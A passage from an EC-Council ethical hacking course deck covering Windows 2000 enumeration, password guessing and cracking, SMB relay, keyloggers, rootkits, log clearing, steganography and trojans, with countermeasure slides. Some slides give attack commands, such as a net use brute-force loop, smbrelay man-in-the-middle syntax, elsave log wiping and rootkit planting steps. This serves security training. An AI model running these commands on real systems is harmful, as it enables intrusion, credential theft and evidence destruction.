  • 93. EC-Council Passive Fingerprinting ~ Passive fingerprinting is also based on the differential implantation of the stack and the various ways an OS responds to it. ~ However, instead of relying on scanning the target host, passive fingerprinting captures packets from the target host and study it for tell tale signs that can reveal the OS. ~ Passive fingerprinting is less accurate than active fingerprinting.
  • 95. EC-Council SocksChain ~ SocksChain is a program that allows to work through a chain of SOCKS or HTTP proxies to conceal the actual IP- address. ~ SocksChain can function as a usual SOCKS-server that transmits queries through a chain of proxies.
  • 96. EC-Council Proxy Servers ~ Proxy is a network computer that can serve as an intermediate for connection with other computers. They are usually used for the following purposes: • As firewall, a proxy protects the local network from outside access. • As IP-addresses multiplexer, a proxy allows to connect a number of computers to Internet when having only one IP-address • Proxy servers can be used (to some extent) to anonymize web surfing. • Specialized proxy servers can filter out unwanted content, such as ads or 'unsuitable' material. • Proxy servers can afford some protection against hacking attacks.
  • 97. EC-Council Anonymizers ~ Anonymizers are services that help make your own web surfing anonymous. ~ The first anonymizer developed was Anonymizer.com, created in 1997 by Lance Cottrell. ~ An anonymizer removes all the identifying information from a user’s computers while the user surfs the Internet, thereby ensuring the privacy of the user.
  • 98. EC-Council Bypassing Firewall using Httptunnel http://www.nocrew.org/software/httptunnel.html ~Httptunnel creates a bidirectional virtual data path tunneled in HTTP requests. The requests can be sent via an HTTP proxy if so desired.
  • 99. EC-Council HTTPort HTTPort allows you to bypass an HTTP proxy, which is blocking you from the Internet. With HTTPort you may use the following software (just a sample list, not limited to !) from behind an HTTP proxy: e-mail, IRC, ICQ, news, FTP, AIM, any SOCKS capable software, etc. etc.
  • 100. EC-Council Summary ~ War dialing is the term given to accessing a network illegally over a compromised phone line. Popular tools include THC war dialer and phone sweep. ~ Scanning is a method adopted by administrators and crackers alike to discover more about a network ~ There are various scan types - SYN, FIN, Connect, ACK, RPC, Inverse Mapping, FTP Bounce, Idle Host etc. The use of a particular scan type depends on the objective at hand. ~ Ways to subvert a standard connection include HTTPort, HTTP tunneling, using proxies, SOCKS chains and anonymizers.
  • 102. EC-Council Module Objective ~ Understanding Windows 2000 enumeration ~ How to Connect via Null Session ~ How to disguise NetBIOS Enumeration ~ Disguise using SNMP enumeration ~ How to steal Windows 2000 DNS information using zone transfers ~ Learn to enumerate users via CIFS/SMB ~ Active Directory enumerations
  • 103. EC-Council What is Enumeration ~ If acquisition and non intrusive probing have not turned up any results, then an attacker will next turn to identifying valid user accounts or poorly protected resource shares. ~ Enumeration involves active connections to systems and directed queries. ~ The type of information enumerated by intruders: • Network resources and shares • Users and groups • Applications and banners
  • 104. EC-Council Net Bios Null Sessions ~ The null session is often refereed to as the Holy Grail of Windows hacking. Null Sessions take advantage of flaws in the CIFS/SMB (Common Internet File System/ Server Messaging Block). ~ You can establish a Null Session with a Windows (NT/2000/XP) host by logging on with a null user name and password. ~ Using these null connections allows you to gather the following information from the host: • List of users and groups • List of machines • List of shares • Users and host SIDs (Security Identifiers)
  • 105. EC-Council So What's the Big Deal? ~Anyone with a NetBIOS connection to your computer can easily get a full dump of all your usernames, groups, shares, permissions, policies, services and more using the Null user. ~The above syntax connects to the hidden Inter Process Communication 'share' (IPC$) at IP address 192.34.34.2 with the built- in anonymous user (/u:'''') with ('''') null password. ~The attacker now has a channel over which to attempt various techniques. ~The CIFS/SMB and NetBIOS standards in Windows 2000 include APIs that return rich information about a machine via TCP port 139 - even to unauthenticated users. C: >net use 192.34.34.2 IPC$ '''' /u: '''‘
  • 106. EC-Council Null Session Countermeasure ~ Null sessions require access to TCP 139 and/ or TCP 445 ports. ~ You could also disable SMB services entirely on individual hosts by unbinding WINS Client TCP/IP from the interface. ~ Edit the registry to restrict the anonymous user. • 1. Open regedt32, navigate to HKLMSYSTEMCurrentControlSetLSA • 2. Choose edit | add value • value name: ResticAnonymous • Data Type: REG_WORD • Value: 2
  • 107. EC-Council NetBIOS Enumeration ~NBTscan is a program for scanning IP networks for NetBIOS name information. ~For each responded host it lists IP address, NetBIOS computer name, logged-in user name and MAC address. ~ The first thing a remote attacker will try on a Windows 2000 network is to get list of hosts attached to the wire. 1. net view / domain, 2. nbstat -A <some IP>
  • 108. EC-Council Hacking Tool: DumpSec DumpSec reveals shares over a null session with the target computer.
  • 109. EC-Council Hacking Tool: NAT ~ The NetBIOS Auditing Tool (NAT) is designed to explore the NetBIOS file-sharing services offered by the target system. ~ It implements a stepwise approach to gather information and attempt to obtain file system-level access as though it were a legitimate local client. ~ If a NETBIOS session can be established at all via TCP port 139, the target is declared "vulnerable“. ~ Once the session is fully set up, transactions are performed to collect more information about the server including any file system "shares" it offers.
  • 110. EC-Council SNMP Enumeration ~ SNMP is simple. Managers send requests to agents, and the agents send back replies. ~ The requests and replies refer to variables accessible to agent software. ~ Managers can also send requests to set values for certain variables. ~ Traps let the manager know that something significant has happened at the agent's end of things: • a reboot • an interface failure, • or that something else that is potentially bad has happened. ~ Enumerating NT users via SNMP protocol is easy using snmputil
  • 113. EC-Council SNMP Enumeration Countermeasures ~ Simplest way to prevent such activity is to remove the SNMP agent or turn off the SNMP service. ~ If shutting off SNMP is not an option, then change the default 'public' community name. ~ Implement the Group Policy security option called Additional restrictions for anonymous connections. ~ Access to null session pipes and null session shares, and IPSec filtering should also be restricted.
  • 114. EC-Council Windows 2000 DNS Zone transfer ~ For clients to locate Win 2k domain services such as Ad and kerberos, Win 2k relies on DNS SRV records. ~ Simple zone transfer (nslookup, ls -d <domainname>) can enumerate lot of interesting network information. ~ An attacker would look at the following records closely: • 1. Global Catalog Service (_gc._tcp_) • 2. Domain Controllers (_ldap._tcp) • 3. Kerberos Authentication (_kerberos._tcp)
  • 115. EC-Council Blocking Win 2k DNS Zone transfer You can easily block zone transfers using the DNS property sheet as shown here.
  • 116. EC-Council Identifying Accounts ~ Two powerful NT/2000 enumeration tools are: • 1.sid2user • 2.user2sid ~ They can be downloaded at (www.chem.msu.su/^rudnyi/NT/) ~ These are command line tools that look up NT SIDs from username input and vice versa.
  • 117. EC-Council Hacking Tool: Enum ~ Available for download from http://razor.bindview.com ~ enum is a console-based Win32 information enumeration utility. ~ Using null sessions, enum can retrieve user lists, machine lists, share lists, name lists, group and membership lists, password and LSA policy information. ~ enum is also capable of rudimentary brute force dictionary attack on individual accounts.
  • 118. EC-Council Hacking tool: Userinfo ~ Userinfo is a little function that retrieves all available information about any known user from any NT/Win2k system that you can hit 139 on. ~ Specifically calling the NetUserGetInfo API call at Level 3, Userinfo returns standard info like • SID and Primary group • logon restrictions and smart card requirements • special group information • pw expiration information and pw age ~ This application works as a null user, even if the RA set to 1 to specifically deny anonymous enumeration.
  • 119. EC-Council Hacking Tool: GetAcct ~ GetAcct sidesteps "RestrictAnonymous=1" and acquires account information on Windows NT/2000 machines. ~ Downloadable from (www.securityfriday.com)
  • 120. EC-Council Active Directory Enumeration ~ All the existing users and groups could be enumerated with a simple LDAP query. ~ The only thing required to perform this enumeration is to create an authenticated session via LDAP. ~ Connect to any AD server using ldp.exe port 389 ~ Authenticate yourself using Guest /pr any domain account ~ Now all the users and built in groups could be enumerated.
  • 121. EC-Council AD Enumeration countermeasures ~ How is this possible with a simple guest account? ~ The Win 2k dcpromo installations screen prompts if the user wants to relax access permissions on the directory to allow legacy servers to perform lookup: 1.Permission compatible with pre-Win2k 2.Permission compatible with only with Win2k ~ Choose option 2 during AD installation.
  • 122. EC-Council Summary ~ Enumeration involves active connections to systems and directed queries. ~ The type of information enumerated by intruders includes network resources and shares, users and groups and applications and banners. ~ Null sessions are used often by crackers to connect to target systems. ~ NetBIOS and SNMP enumerations can be disguised using tools such as snmputil, nat etc. ~ Tools such as user2sid, sid2user and userinfo can be used to identify vulnerable user accounts.
  • 124. EC-Council Module Objective ~ Understand the following • Remote password guessing • Eavesdropping • Denial of Service • Buffer overflows • Privilege escalation • Password cracking • keystroke loggers • sniffers • Remote control and backdoors • Port re direction • Covering tracks • Hiding files
  • 125. EC-Council Administrator Password Guessing ~ Assuming that NetBIOS TCP139 port is open, the most effective method of breaking into NT/2000 is password guessing. ~ Attempting to connect to an enumerated share (IPC$, or C$) and trying username/password. ~ Default Admin$, C$, %Systemdrive% shares are good starting point.
  • 126. EC-Council Performing automated password guessing ~Performing automated password guessing is easy-simple loop using the NT/2000 shell for command based on the standard NET USE syntax. ~1. Create a simple username and password file. ~2. Pipe this file into FOR command ~C:> FOR /F "token=1, 2*" %i in (credentials.txt) ~do net use targetIPC$ %i /u: %j
  • 127. EC-Council Tool: Legion ~ Legion automates the password guessing in NetBIOS sessions. Legion will scan multiple Class C IP address ranges for Windows shares and also offers a manual dictionary attack tool.
  • 128. EC-Council Hacking tool: NTInfoScan (now CIS) ~ NTInfoScan is a security scanner for NT 4.0 is a vulnerability scanner that produces an HTML based report of security issues found on the target system and further information.
  • 129. EC-Council Password guessing Countermeasures ~ Block access to TCP and UDP ports 135-139. ~ Disable bindings to Wins client on any adapter. ~ Use complex passwords ~ Log failed logon attempts in Event viewer - Security log full event 529 or 539 - Logon/Logoff
  • 130. EC-Council Monitoring Event Viewer Logs ~ Logging is of no use if no one ever analyzes the logs ~ VisualLast from www.foundstone.com formats the event logs visually
  • 131. EC-Council Password Sniffing Password guessing is hard work. Why not just sniff credentials off the wire as users log in to a server and then replay them to gain access?
  • 132. EC-Council Hacking Tool: LOphtcrack ~ LC4 is a password auditing and recovery package distributed by @stake software. SMB packet capture listens to the local network segment and captures individual login sessions. ~ With LOphtcrack password cracking engine anyone can sniff the ire for extended periods is most guaranteed to obtain Administrator status in matter of days.
  • 133. EC-Council Hacking Tool: KerbCrack ~KerbCrack consists of two programs, kerbsniff and kerbcrack. The sniffer listens on the network and captures Windows 2000/XP Kerberos logins. The cracker can be used to find the passwords from the capture file using a bruteforce attack or a dictionary attack.
  • 134. EC-Council Privilege Escalation ~ If an attacker gains access to the network using non-admin user account, the next step is to gain higher privilege to that of an administrator. ~ This is called privilege escalation
  • 135. EC-Council Tool: GetAdmin ~ GetAdmin.exe is a small program that adds a user to the local administrators group. ~ It uses low-level NT kernel routine to set a globalflag allowing access to any running process. ~ You need to logon to the server console to execute the program. ~ The GetAdmin.exe is run from the command line or from a browser. ~ This only works with Nt 4.0 Service pack 3.
  • 136. EC-Council Tool: hk.exe ~ The hk.exe utility exposes a Local Procedure Call flaw in NT. ~ A non-admin user can be escalated to administrators group using hk.exe
  • 137. EC-Council Manual Password Cracking Algorithm ~Find a valid user ~Create a list of possible passwords ~Rank the passwords from high probability to low ~Key in each password ~If the system allows you in - Success ~Else try till success
  • 138. EC-Council Automatic Password Cracking Algorithm ~Find a valid user ~Find encryption algorithm used ~Obtain encrypted passwords ~Create list of possible passwords ~Encrypt each word ~See if there is a match for each user ID ~Repeat steps 1 through 6
  • 139. EC-Council Password Types ~ Passwords that contain only letters. ~ Passwords that contain only numbers. ~ Passwords that contain only special characters. ~ Passwords that contain letters and numbers. ~ Passwords that contain only letters and special characters. ~ Passwords that contain only special characters and numbers. ~ Passwords that contain letters, special characters and numbers.
  • 140. EC-Council Types of Password Attacks ~ Dictionary attack ~ Brute force attack ~ Hybrid attack ~ Social engineering ~ Shoulder surfing ~ Dumpster diving
  • 141. EC-Council Cracking NT/2000 passwords ~ SAM file in Windows NT/2000 contains the usernames and encrypted passwords. The SAM file is located at %systemroot%system32config directory ~ The file is locked when the OS is running. • Booting to an alternate OS – NTFSDOS (www.sysInternals.com) will mount any NTFS partition as a logical drive. • Backup SAM from the Repair directory – Whenever rdisk /s is run, a compressed copy of the SAM called SAM._ is created in %systemroot%repair. Expand this file using c:>expand sam._sam • Extract the hashes from the SAM – Use LOphtcrack to hash the passwords.
  • 142. EC-Council Redirecting SMB Logon to the Attacker ~Eavesdropping on LM responses becomes much easier if the attacker can trick the victim to attempt Windows authentication of the attacker's choice. ~Basic trick is to send an email message to the victim with an embedded hyperlink to a fraudulent SMB server. ~When the hyperlink is clicked, the user unwittingly sends his credentials over the network.
  • 143. EC-Council Hacking Tool: SMBRelay ~ SMBRelay is essentially a SMB server that can capture usernames and password hashes from incoming SMB traffic. ~ It can also perform man-in-the-middle (MITM) attacks. ~ You must disable NetBIOS over TCP/IP and block ports 139 and 445. ~ Start the SMBRelay server and listen for SMB packets: • c:>smbrelay /e • c:>smbrelay /IL 2 /IR 2 ~ An attacker can access the client machine by simply connecting to it via relay address using: c:> net use * <capture _ip>c$
  • 144. EC-Council SMBRelay man-in-the-middle Scenario ~The attacker in this setting sets up a fraudulent server at 192.168.234.251, a relay address of 192.168.234.252 using /R, and a target server address of 192.168.234.34 with /T. c:> smbrelay /IL 2 /IR /R 192.168.234.252 /T 192.168.234.34 ~When a victim client connects to the fraudulent server thinking it is talking to the target, MITM server intercepts the call, hashes the password and passes the connection to the target server.
  • 145. EC-Council SMBRelay Weakness & Countermeasures ~ The problem is to convince a victim's client to authenticate to the MITM server ~ You can send a malicious e- mail message to the victim client with an embedded hyperlink to the SMBRelay server's IP address. ~ Another solution is ARP poisoning attack against the entire segment causing all of the systems on the segment to authenticate through the fraudulent MITM server Countermeasures ~ Configure Windows 2000 to use SMB signing. ~ Client and server communication will cause it to cryptographically sign each block of SMB communications. ~ These settings are found under Security Policies /Security Options
  • 146. EC-Council Hacking Tool: SMB Grind SMBGrind increases the speed of LOphtcrack sessions on sniffer dumps by removing duplication and providing a facility to target specific users without having to edit the dump files manually.
  • 147. EC-Council Hacking Tool: SMBDie ~ SMBDie tool crashes computers running Windows 2000/XP/NT by sending specially crafted SMB request.
  • 148. EC-Council Hacking Tool: NBTDeputy ~ NBTDeputy register a NetBIOS computer name on the networkand is ready to respond to NetBT name-query requests. ~ NBTdeputy helps to resolve IP address from NetBIOS computer name. It's similar to Proxy ARP. ~ This tool works well with SMBRelay. ~ For example, SMBRelay runs on a computer as ANONYMOUS-ONE and the IP address is 192.168.1.10 and NBTDeputy is also ran and 192.168.1.10 is specified. SMBRelay may connect to any XP or .NET server when the logon users access "My Network Places"
  • 149. EC-Council NeBIOS DoS Attack ~ Sending a 'NetBIOS Name Release' message to the NetBIOS Name Service (NBNS, UDP 137) on a target NT/2000 machine forces it to place its name in conflict so that the system will no longer will be able to use it. ~ This will block the client from participating in the NetBIOS network. ~ Tool: nbname • NBName can disable entire LANs and prevent machines from rejoining them. • Nodes on a NetBIOS network infected by the tool will think that their names already are being used by other machines.
  • 150. EC-Council Hacking Tool: John the Ripper ~ It is a command line tool designed to crack both Unix and NT passwords. John is extremely fast and free ~ The resulting passwords are case insensitive and may not represent the real mixed-case password.
  • 151. EC-Council What is LanManager Hash? Example: Lets say your password is: '123456qwerty' ~ When this password is encrypted with LM algorithm, it is first converted to all uppercase: '123456QWERTY' ~ The password is padded with null (blank) characters to make it 14 character length: '123456QWERTY_' ~ Before encrypting this password, 14 character string is split into half: '123456Q and WERTY_' ~ Each string is individually encrypted and the results concatenated. ~ '123456Q' = 6BF11E04AFAB197F 'WERTY_' = F1E9FFDCC75575B15 ~ The hash is 6BF11E04AFAB197FF1E9FFDCC75575B15 Note: The first half of the hash contains alpha-numeric characters and it will take 24 hrs to crack by LOphtcrack and second half only takes 60 seconds.
  • 152. EC-Council Password Cracking Countermeasures ~ Enforce 7-12 character alpha-numeric passwords. ~ Set the password change policy to 30 days. ~ Physically isolate and protect the server. ~ Use SYSKEY utility to store hashes on disk. ~ Monitor the server logs for brute force attacks on user accounts.
  • 153. EC-Council Keystroke Loggers ~If all other attempts to sniff out domain privileges fail, then keystroke logger is the solution. ~Keystroke loggers are stealth software that sits between keyboard hardware and the operating system, so that they can record every key stroke. ~There are two types of keystroke loggers: • 1. Software based and • 2. Hardware based.
  • 154. EC-Council Spy ware: Spector (www.spector.com) ~Spector is a spy ware and it will record everything anyone does on the internet. ~Spector automatically takes hundreds of snapshots every hour, very much like a surveillance camera. With spector, you will be able to see exactly what your surveillance targets have been doing online and offline. ~Spector works by taking a snapshot of whatever is on your computer screen and saves it away in a hidden location on your computer's hard drive.
  • 155. EC-Council Hacking Tool: eBlaster (www.spector.com) ~eBlaster lets you know EXACTLY what your surveillance targets are doing on the internet even if you are thousands of miles away. ~eBlaster records their emails, chats, instant messages, websites visited and keystrokes typed and then automatically sends this recorded information to your own email address. ~Within seconds of them sending or receiving an email, you will receive your own copy of that email.
  • 157. EC-Council Hacking Tool: Hardware Key Logger (www.keyghost.com) ~ The Hardware Key Logger is a tiny hardware device that can be attached in between a keyboard and a computer. ~ It keeps a record of all key strokes typed on the keyboard. The recording process is totally transparent to the end user.
  • 158. EC-Council Anti Spector (www.antispector.de) ~ This tool will detect Spector and detect them from your system.
  • 159. EC-Council Hacking Tool: RootKit ~ What if the very code of the operating system came under the control of the attacker? ~ The NT/2000 rootkit is built as a kernel mode driver which can be dynamically loaded at run time. ~ The NT/2000 rootkit runs with system privileges, right at the core of the NT kernel, so it has access to all the resources of the operating system. ~ The rootkit can also: • hide processes (that is, keep them from being listed) • hide files • hide registry entries • intercept keystrokes typed at the system console • issue a debug interrupt, causing a blue screen of death • redirect EXE files
  • 160. EC-Council Planting the NT/2000 Rootkit ~The rootkit contains a kernel mode device driver, called _root_.sys and a launcher program, called deploy.exe ~After gaining access to the target system, he will copy _root_.sys and deploy.exe onto the target system and execute deploy.exe ~This will install the rootkit device driver and start it up. The attacker later deletes deploy.exe from the target machine. ~ The attacker can then stop and restart the rootkit at will by using the commands net stop _root and net start _root_ ~ Once the rootkit is started, the file _root_.sys stops appearing in the directory listings. The rootkit intercepts the system calls for listing files and hides all files beginning with _root_ from display.
  • 161. EC-Council Rootkit Countermeasures ~Back up critical data (not binaries!) Wipe everything clean and reinstall OS/applications from trusted source. ~Don’t rely on backups, because you could be restoring from trojaned software. ~Keep a well documented automated installation procedure. ~Keep availability of trusted restoration media.
  • 162. EC-Council Covering Tracks ~ Once intruders have successfully gained Administrator access on a system, they will try to cover the detection of their presence. ~ When all the information of interest has been stripped from the target, they will install several back doors so that easy access can be obtained in the future.
  • 163. EC-Council Disabling Auditing ~ First thing intruders will do after gaining Administrator privileges is to disable auditing. ~ NT Resource Kit's auditpol.exe tool can disable auditing using command line. ~ At the end of their stay, the intruders will just turn on auditing again using auditpol.exe
  • 164. EC-Council Clearing the Event log ~ Intruders can easily wipe out the logs in the event viewer ~ Event viewer on the attackers host can open, read and clear logs of the remote host. ~ This process will clear logs of all records but will leave one record stating that the event log has been cleared by 'Attacker'
  • 165. EC-Council Tool: elsave.exe ~ elsave.exe utility is a simple tool for clearing the event log. The following syntax will clear the security log on the remote server 'rovil' ( correct privileges are required on the remote system) ~Save the system log on the local machine to d:system.log and then clear the log: elsave -l system -F d:system.log –C ~Save the application log on serv1 to serv1d$application.log: elsave -s serv1 -F d:application.log
  • 166. EC-Council Hacking Tool: WinZapper ~ Wizapper is a tool that an attacker can use to erase event records selectively from the security log in Windows 2000. ~ To use the program, the attacker runs winzapper.exe and marks the event records to be deleted, then he presses 'delete events' and 'exit'. Presto the events disappear. ~ To sum things up: after an attacker has gained Administrators access to the system, one simply cannot trust the security log!
  • 167. EC-Council Evidence Eliminator ~ Evidence Eliminator is an easy to use powerful and flexible data cleansing system for Windows PC. ~ Daily use protects you from unwanted data becoming permanently hidden in your PC. ~ It cleans recycle bins, Internet cache, system files, temp folders etc.
  • 168. EC-Council Hiding Files ~ There are two ways of hiding files in NT/2000. • 1. Attrib – use attrib +h [file/directory] • 2. NTFS Alternate Data Streaming – NTFS files system used by Windows NT, 2000 and XP has a feature Alternate Data Streams - allow data to be stored in hidden files that are linked to a normal visible file. ~ Streams are not limited in size and there can be more than one stream linked to a normal file.
  • 169. EC-Council Creating Alternate Data Streams ~Start by going to the command line and typing notepad test.txt ~Put some data in the file, save the file, and close Notepad. ~From the command line, type dir test.txt and note the file size. ~Next, go to the command line and type notepad test.txt:hidden.txt Type some text into Notepad, save the file, and close. ~Check the file size again and notice that it hasn’t changed! ~If you open test.txt, you see your original data and nothing else. ~If you use the type command on the filename from the command line, you still get the original data. ~If you go to the command line and type type test.txt:hidden.txt you get an error.
  • 170. EC-Council Tools: ADS creation and detection makestrm.exe moves the physical contents of a file to its stream. ~ ads_cat from Packet Storm is a utility for writing to NTFS's Alternate File Streams and includes ads_extract, ads_cp, and ads_rm, utilities to read, copy, and remove data from NTFS alternate file streams. ~ Mark Russinovich at www.sysinternals.com has released freeware utility Streams which displays NTFS files that have alternate streams content. ~ Heysoft has released LADS (List Alternate Data Streams), which scans the entire drive or a given directory. It lists the names and size of all alternate data streams it finds.
  • 171. EC-Council NTFS Streams countermeasures ~ Deleting a stream file involves copying the 'front' file to a FAT partition, then copying back to NTFS. ~ Streams are lost when the file is moved to FAT Partition. ~ LNS.exe from (http://nt security.nu/cgi- bin/download/lns.exe.pl) can detect streams.
  • 172. EC-Council Stealing Files using Word Documents ~ Anyone who saves a word document has a potentially new security risk to consider – one that no current anti- virus or Trojan scanner will turn up. ~ The contents of the files on victim's hard drives can be copied and sent outside your firewall without even their knowing. ~ The threat takes advantage of a special feature of word called field codes. ~ Here's how it might work: Someone sends victim a Word document with a field-code bug. The victim opens the file in Word, saves it (even with no changes) , then sends it back to the originator.
  • 173. EC-Council Field Code Counter measures ~Use Hidden Field Detector. It's available free at: http://www.woodyswatch.c om/util/sniff/ ~Hidden field Detector upon installation will install itself on your Word Tools Menu. ~It scans your documents for potentially troublesome field codes, which you cant see easily and even warns you when it finds something suspicious.
  • 174. EC-Council What is Steganography? ~The process of hiding data in images is called Steganography. ~The most popular method for hiding data in files is to utilize graphic images as hiding place. ~Attackers can embed information such as: 1.Source code for hacking tool 2.List of compromised servers 3.Plans for future attacks 4..your grandma/s secret cookie recipe
  • 175. EC-Council Tool : Image Hide ~ImageHide is a steganography program. Can Hide loads of text in images. ~Simple encrypt and decrypt of data ~Even after adding bytes of data, there is no increase in image size. ~Image looks the same to normal paint packages ~Loads and saves to files and gets past all the mail sniffers.
  • 176. EC-Council Tool: Mp3Stego ~MP3Stego will hide information in MP3 files during the compression process. ~The data is first compressed, encrypted and then hidden in the MP3 bit stream.
  • 177. EC-Council Tool: Snow.exe ~ Snow is a whitespace steganography program and is used to conceal messages in ASCII text by appending whitespace to the end of lines. ~ Because spaces and tabs are generally not visible in text viewers, the message is effectively hidden from casual observers. If the built in encryption is used, the message cannot be read even if it is detected.
  • 178. EC-Council Tool: Camera/Shy ~ Camera/Shy works with Windows and Internet Explorer and lets users share censored or sensitive information buried within an ordinary gif image. ~ The program lets users encrypt text with a click of the mouse and bury the text in an image. The files can be password protected for further security. ~ Viewers who open the pages with the Camera/Shy browser tool can then decrypt the embedded text on the fly by double-clicking on the image and supplying a password.
  • 179. EC-Council Steganography Detection ~ Stegdetect is an automated tool for detecting steganographic content in images. ~ It is capable of detecting different steganographic methods to embed hidden information in JPEG images. ~ Stegbreak is used to launch dictionary attacks against Jsteg-Shell, JPHide and OutGuess 0.13b.
  • 180. EC-Council Tool: dskprobe.exe ~ Windows 2000 Installation CD-ROM ~ dskprobe.exe is a low level disk editor located in Support Tools directory. ~ Steps to read the efs temp contents: 1.Launch dskprobe and open the physical drive to read. 2.Click the Set Active button adjustment to the drive after it populates the handle '0'. 3.Click Tools -> Search sectors and search for string efs0.tmp (in sector 0 at the end of the disk). 4.You should select Exhaustive Search, Ignore Case and Unicode characters.
  • 181. EC-Council Buffer overflows ~A buffer overrun is when a program allocates a block of memory of a certain length and then tries to stuff too much data into the buffer, with extra overflowing and overwriting possibly critical information crucial to the normal execution of the program. Consider the following source code: ~When the source is compiled and turned into a program and the program is run, it will assign a block of memory 32 bytes long to hold the name string. Buffer overflow will occur if you enter: 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAA
  • 182. EC-Council Outlook Buffer Overflow ~ There is a vulnerability in Microsoft Outlook client. The attacker sends an e-mail with a malformed header that causes buffer overflow to occur. 1. It will cause the victim's machine to crash or 2.Cause arbitrary code to run on the victim's computer. ~ Affects the following versions: Microsoft Outlook versions 97/98 and 2000. Microsoft Outlook Express 4.0, 4.01. 5.0 and 5.01
  • 183. EC-Council List of Buffer Overflow Cases ~ Netmeeting 2.x exploit ~ (http://www.cultdeadcow.com/cDc_files/cDc-351/) ~ NT RAS Exploit ~ (http://www.cerberus-infosec.co.uk/wprasbuf.html) ~ IIS Hack ~ (http://www.eeye.com) ~ Oracle Web Exploit ~ (http://www.cerberus-infosec.co.uk/advowl.html) ~ Outlook Exploit ~ (http://www.ussrback.com/labs50.html) ~ IIS .printer ~ (http://www.securityfocus.com/bid/2674)
  • 184. EC-Council Protection against Buffer Overflows ~ Buffer overflow vulnerabilities are inherent in code due to poor or no error checking. ~ General ways of protecting against buffer overflows: 1. Close the port of service 2. apply vendors patch or install the latest version of the software 3. Filter specific traffic at the firewall 4. Test key application 5. Run software at the least privilege required
  • 185. EC-Council Summary ~ Hackers use a variety of means to penetrate systems. ~ Password guessing / cracking is one of the first steps. ~ Password sniffing is a preferred eavesdropping tactic. ~ Vulnerability scanning aids hacker to identify which password cracking technique to use. ~ Key stroke logging /other spy ware tools are used as they gain entry to systems to keep up the attacks. ~ Invariably evidence of “having been there and done the damage” is eliminated by attackers. ~ Stealing files as well as Hiding files are means used to sneak out sensitive information.
  • 188. EC-Council Module Objective ~ Terms of reference for various malicious code ~ Defining Trojans and backdoors ~ Understanding the various backdoor genre ~ Overview of various Trojan tools ~ Learning effective prevention methods and countermeasures ~ Overview of Anti-Trojan software ~ Learning to generate a Trojan program
  • 189. EC-Council Trojans and Backdoors A Trojan horse is: ~ An unauthorized program contained within a legitimate program. This unauthorized program performs functions unknown (and probably unwanted) by the user. ~ A legitimate program that has been altered by the placement of unauthorized code within it; this code performs functions unknown (and probably unwanted) by the user. ~ Any program that appears to perform a desirable and necessary function but that (because of unauthorized code within it that is unknown to the user) performs functions unknown (and definitely unwanted) by the user.
  • 190. EC-Council Working of Trojans Internet Trojaned System Attacker ~Attacker gets access to the trojaned system as the system goes online ~By way of the access provided by the trojan attacker can stage attacks of different types.
  • 191. EC-Council Various Trojan Genre ~ Remote Access Trojans ~ Password Sending Trojans ~ Keyloggers ~ Destructive ~ Denial Of Service (DoS) Attack Trojans ~ Proxy/Wingate Trojans ~ FTP Trojans ~ Software Detection Killers
  • 192. EC-Council Modes of Transmission ~ ICQ ~ IRC ~ Attachments ~ Physical Access ~ Browser And E-mail Software Bugs ~ NetBIOS (File Sharing) ~ Fake Programs ~ Un-trusted Sites And Freeware Software
  • 193. EC-Council Tool: QAZ ~ It is a companion virus that can spread over the network. ~ It also has a "backdoor" that will enable a remote user to connect to and control the computer using port 7597. ~ It may have originally been sent out by email. ~ Rename notepad to note.com ~ Modifies the registry key: HKLMsoftwareMicrosoftWindowsCurrentVersion Run
  • 194. EC-Council Hacking Tool:Tini http://ntsecurity.nu/toolbox/tini ~ It is a very tiny trojan program which is only 3 kb and programmed in assembly language. It takes minimal bandwidth to get on victim's computer and takes small disk space. ~ Tini only listens on port 7777 and runs a command prompt when someone attaches to this port. The port number is fixed and cannot be customized. This makes it easier for a victim system to detect by scanning for port 7777. ~ From a tini client you can telnet to tini server at port 7777
  • 195. EC-Council Tool: Netcat ~Outbound or inbound connections, TCP or UDP, to or from any ports ~Ability to use any local source port ~Ability to use any locally-configured network source address ~Built-in port-scanning capabilities, with randomizer ~Built-in loose source-routing capability
  • 196. EC-Council Tool: Donald Dick Donald Dick is a tool that enables a user to control another computer over a network. It uses a client server architecture with the server residing on the victim's computer. The attacker uses the client to send command through TCP or SPX to the victim listening on a pre defined port. Donald Dick uses default port either 23476 or 23477
  • 197. EC-Council Tool: SubSeven ~SubSeven is a backdoor program that enables others to gain full access to Windows 9x systems through network connection. ~The program consists of three different components : Client (SubSeven.exe), Server (Server.exe) and a Server configuration utility (EditServer.exe). ~The client is a GUI used to connect to server through a network or internet connection.
  • 198. EC-Council Tool: Back Oriffice 2000 BO2K has stealth capabilities, it will not show up on the task list and runs completely in hidden mode. Back Orifice accounts for highest number of infestations on Microsoft computers. The BO2K server code is only 100KB. The client program is 500KB. Once installed on a victim PC or server machine, BO2K gives the attacker complete control of the system.
  • 199. EC-Council Back Oriffice Plug-ins ~ BO2K functionality can be extended using BO plug-ins. ~ BOPeep (Complete remote control snap in) ~ Encryption (Encrypts the data sent between the BO2K GUI and the server) ~ BOSOCK32 (Provides stealth capabilities by using ICMP instead of TCP UDP) ~ STCPIO (Provides encrypted flow control between the GUI and the server, making the traffic more difficult to detect on the network)
  • 201. EC-Council Wrappers ~ How does an attacker get BO2K or any trojan installed on the victim's computer? Answer: Using Wrappers ~ A wrapper attaches a given EXE application (such as games or orifice application) to the BO2K executable. ~ The two programs are wrapped together into a single file. When the user runs the wrapped EXE, it first installs BO2K and then runs the wrapped application. ~ The user only sees the latter application. One can send a birthday greeting which will install BO2K as the user watches a birthday cake dancing across the screen.
  • 203. EC-Council Hacking Tool: Silk Rope http://www.h2ohackerz.co.uk/ind ex2.htm ~Silk Rope is a wrapper program and has an easy to use user- interface. ~Silk Rope binds BO installer with a program of your choosing, saving the result as a single file. ~Presently, the icon is the generic single-file-install icon (an opening box with a window in the background), you can change it with an icon utility such as Microangelo.
  • 204. EC-Council Tool: EliteWrap ~ http://homepage.ntlworld.com/chawmp/elitewrap/ ~ EliteWrap is an advanced EXE wrapper for Windows 95/98/2K/NT used for SFX archiving and secretly installing and running programs. ~ With EliteWrap one can create a setup program that would extract files to a directory and execute programs or batch files to display help, copy files, etc.
  • 205. EC-Council Tool: IconPlus IconPlus can be used to change icons in EXE files
